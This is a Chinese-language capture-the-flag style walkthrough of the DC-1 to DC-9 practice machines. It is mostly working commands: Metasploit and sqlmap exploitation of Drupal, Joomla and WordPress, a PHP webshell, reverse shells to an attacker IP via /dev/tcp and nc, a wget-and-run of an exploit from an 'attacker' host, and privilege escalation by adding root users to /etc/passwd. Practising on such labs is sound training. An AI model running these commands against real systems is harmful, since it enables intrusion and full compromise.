DC1~9解析
字数 1123 2025-08-22 12:22:54
DC1~9靶机渗透测试实战解析
DC-1靶机渗透
信息收集
-
使用nmap扫描靶机IP和开放端口:
nmap -A 192.168.193.135发现开放22(SSH)、80(HTTP)和111(RPC)端口
-
Web应用识别为Drupal CMS
漏洞利用
-
使用Metasploit利用Drupal漏洞:
search drupal use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS http://192.168.193.135/ exploit -
获取初始shell后升级为交互式shell:
python -c 'import pty;pty.spawn("/bin/sh")'
权限提升
-
查找配置文件获取数据库凭据:
cat /var/www/sites/default/settings.php -
访问MySQL数据库:
mysql -udbuser -pR0ck3t use drupaldb; select * from users; -
生成Drupal密码hash并更新管理员密码:
cd /var/www/ php scripts/password-hash.sh admin update users set pass='$S$DeJENChbGzXmqiWHeWP15OhPLXcZersPejLwZRC4T5iGDAG5WgwM' where name='admin'; -
使用SUID提权:
find / -perm -u=s -type f 2>/dev/null /usr/bin/find ./aaa -exec '/bin/sh' \;
DC-2靶机渗透
信息收集
-
修改hosts文件添加解析:
echo "192.168.x.x dc-2" >> /etc/hosts -
识别为WordPress站点
密码爆破
-
使用cewl生成密码字典:
cewl http://dc-2/index.php/flag/ -w pass.txt -
枚举WordPress用户:
wpscan --url http://dc-2 -e u -
爆破用户密码:
wpscan --url http://dc-2 -U users.txt -P pass.txt
SSH登录与rbash逃逸
-
登录后受限rbash环境,使用vi逃逸:
vi :set shell=/bin/bash :shell export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin/ -
切换用户:
su jerry password: adipiscing
Git提权
-
检查sudo权限:
sudo -l -
利用Git提权:
sudo git help config !/bin/bash
DC-3靶机渗透
信息收集
- 识别为Joomla 3.7.0
SQL注入利用
-
使用sqlmap自动化注入:
sqlmap -u "http://192.168.193.137/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -
获取管理员hash并破解:
john --wordlist=/usr/share/wordlists/rockyou.txt admin_hash.txt
文件上传与反弹shell
-
上传PHP webshell:
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.193.128/55555 0>&1'");?> -
内核提权:
searchsploit Linux 3.16.0
DC-4靶机渗透
Web登录爆破
- 爆破admin密码成功:admin:happy
命令执行与提权
-
通过命令执行反弹shell:
nc 192.168.193.128 4444 -e /bin/bash -
邮件系统发现密码:
cat /var/spool/mail/charles -
使用teehee提权:
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
DC-5靶机渗透
文件包含与日志污染
-
包含nginx日志文件:
/var/log/nginx/error.log -
写入PHP代码:
<?php system($_GET['cmd']);?>
Screen提权
- 利用screen 4.5.0漏洞:
cd /tmp wget http://attacker/exploit.sh chmod +x exploit.sh ./exploit.sh
DC-6靶机渗透
WordPress爆破
- 使用wpscan爆破:
wpscan --url "http://wordy/" -U dc-6.txt -P passwd.txt
命令执行与提权
-
通过后台命令执行反弹shell
-
利用nmap提权:
echo 'os.execute("/bin/sh")' > shell.sh sudo nmap --script=shell.sh
DC-7靶机渗透
GitHub信息泄露
-
发现数据库凭据在GitHub
-
SSH登录:
ssh dc7user -p 22 password: MdR3xOgB7#dW
Drush密码重置
- 使用drush重置管理员密码:
drush user-password admin --password="admin"
定时任务提权
- 写入反弹shell到定时脚本:
echo "nc -e /bin/bash 192.168.193.128 4444" >> /opt/scripts/backups.sh
DC-8靶机渗透
SQL注入
- 使用sqlmap获取凭据:
sqlmap -u "http://192.168.193.143/?nid=1" --batch --dbs -D d7db --tables -T users --columns —C name pass -dump
Exim提权
- 利用exim 4.89漏洞:
./46996.sh -m netcat
DC-9靶机渗透
SQL注入与密码破解
-
获取Staff数据库凭据
-
使用john破解:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
端口敲门
- 按顺序扫描特定端口激活SSH:
nmap -p 7469 192.168.193.144 nmap -p 8475 192.168.193.144 nmap -p 9842 192.168.193.144
密码文件注入
-
生成加密密码:
openssl passwd -1 -salt dc 123456 -
添加root用户:
echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dc sudo /opt/devstuff/dist/test/test /tmp/dc /etc/passwd su dc password: 123456
总结
本系列靶机涵盖了多种渗透测试技术:
- CMS漏洞利用(Drupal, WordPress, Joomla)
- Web漏洞(SQL注入、文件包含、日志污染)
- 密码爆破与哈希破解
- 权限提升技术(SUID、内核漏洞、定时任务)
- 受限环境逃逸(rbash)
- 服务配置漏洞利用(Exim, Screen)
- 隐蔽通道(端口敲门)
每种技术都需要根据目标环境灵活应用,渗透测试过程中要注重信息收集和权限维持。